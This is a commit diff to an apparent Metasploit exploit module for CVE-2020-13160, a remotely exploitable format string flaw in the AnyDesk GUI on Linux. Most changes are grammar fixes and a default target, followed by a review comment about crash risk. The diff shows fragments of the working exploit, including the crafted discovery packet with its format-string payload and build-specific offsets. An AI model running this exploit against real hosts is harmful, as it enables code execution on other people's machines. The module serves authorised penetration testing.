Fix some grammatical mistakes and set a default target for anydesk
parent
bb33bc9c62
commit
a27bf9df38
|
@ -3,18 +3,17 @@
|
|||
This vulnerability affects Linux versions 5.5.2 and older. Old versions of AnyDesk can be downloaded from their site at
|
||||
https://download.anydesk.com/linux/. Use the `.deb` package for an Ubuntu installation.
|
||||
|
||||
The check method on this exploit will send an AnyDesk discovery frame to the target host, which will cause the the
|
||||
target to respond with it's own discovery frame. Each of these are sent from a random source port to the default AnyDesk
|
||||
The `check` method on this exploit will send an AnyDesk discovery frame to the target host, which will cause the
|
||||
target to respond with its own discovery frame. Each of these are sent from a random source port to the default AnyDesk
|
||||
discovery service port of 50001. To configure the listening service in Metasploit, change the `SRVHOST` and `SRVPORT`
|
||||
options. The exploit will use this method to detect the remote hostname and confirm that the operating system is Linux
|
||||
before proceeding.
|
||||
|
||||
## Verification Steps
|
||||
Example steps in this format (is also in the PR):
|
||||
|
||||
1. Install the application
|
||||
1. Start the AnyDesk GUI. A window will open, leave it running.
|
||||
1. Start msfconsole
|
||||
1. Start `msfconsole`
|
||||
1. Do: `use exploit/linux/misc/cve_2020_13160_anydesk`
|
||||
1. Set the module options
|
||||
1. Do: `exploit`
|
||||
|
|
|
@ -1,5 +1,7 @@
|
|||
##
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = NormalRanking
|
||||
|
@ -14,7 +16,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'Name' => 'AnyDesk GUI Format String Write',
|
||||
'Description' => %q{
|
||||
The AnyDesk GUI is vulnerable to a remotely exploitable format string vulnerability. By sending a specially
|
||||
crafted discovery packet, an attacker can corrupt the front end process when it loads or refreshes. While the
|
||||
crafted discovery packet, an attacker can corrupt the frontend process when it loads or refreshes. While the
|
||||
discovery service is always running, the GUI frontend must be started to trigger the vulnerability. On
|
||||
successful exploitation, code is executed within the context of the user who started the AnyDesk GUI.
|
||||
},
|
||||
|
@ -26,8 +28,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2020-13160' ],
|
||||
[ 'URL', 'https://devel0pment.de/?p=1881' ],
|
||||
|
||||
[ 'URL', 'https://devel0pment.de/?p=1881' ]
|
||||
],
|
||||
'Payload' => {
|
||||
'Space' => 512,
|
||||
|
@ -56,6 +57,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
{ 'stkref1' => 93, 'stkref2' => 165, 'time@got.plt' => 0x119ddc0 - 135 }
|
||||
]
|
||||
],
|
||||
'DefaultTarget' => 0,
|
||||
'DisclosureDate' => '2020-06-16'
|
||||
)
|
||||
)
|
||||
|
@ -148,7 +150,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
udp_sock.put(build_discover_packet(hn, "#{bad_unicode}%#{target['time@got.plt']}x%#{target['stkref1']}$ln", 'ad', 'main'))
|
||||
print_status('Sent exploit frame, waiting for the GUI to refresh to trigger the vulnerability...')
|
||||
|
||||
handler
|
||||
ensure
|
||||
disconnect_udp
|
||||
end
|
||||
end
|
||||
|
|
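Review bot: The `'DefaultTarget' => 0` line added in the `-56,6 +57,7` hunk makes the first target the implicit choice, but each target hash carries build-specific values (`stkref1`, `stkref2`, `time@got.plt`) and nothing visible in these hunks ties target 0 to the build actually installed. The documentation in this same commit says `check` only detects the remote hostname and confirms the operating system is Linux, so a mismatched build would presumably crash the AnyDesk frontend rather than fail cleanly. I would document that next to the setting, e.g. `# Offsets are build-specific; target 0 is only a default and a mismatch is expected to crash the GUI process`. If the module does not already declare it outside these hunks, a `'Notes'` entry whose `'Stability'` value reflects the crash risk would also help. The `initialize` body that holds this hash starts and ends outside the hunk.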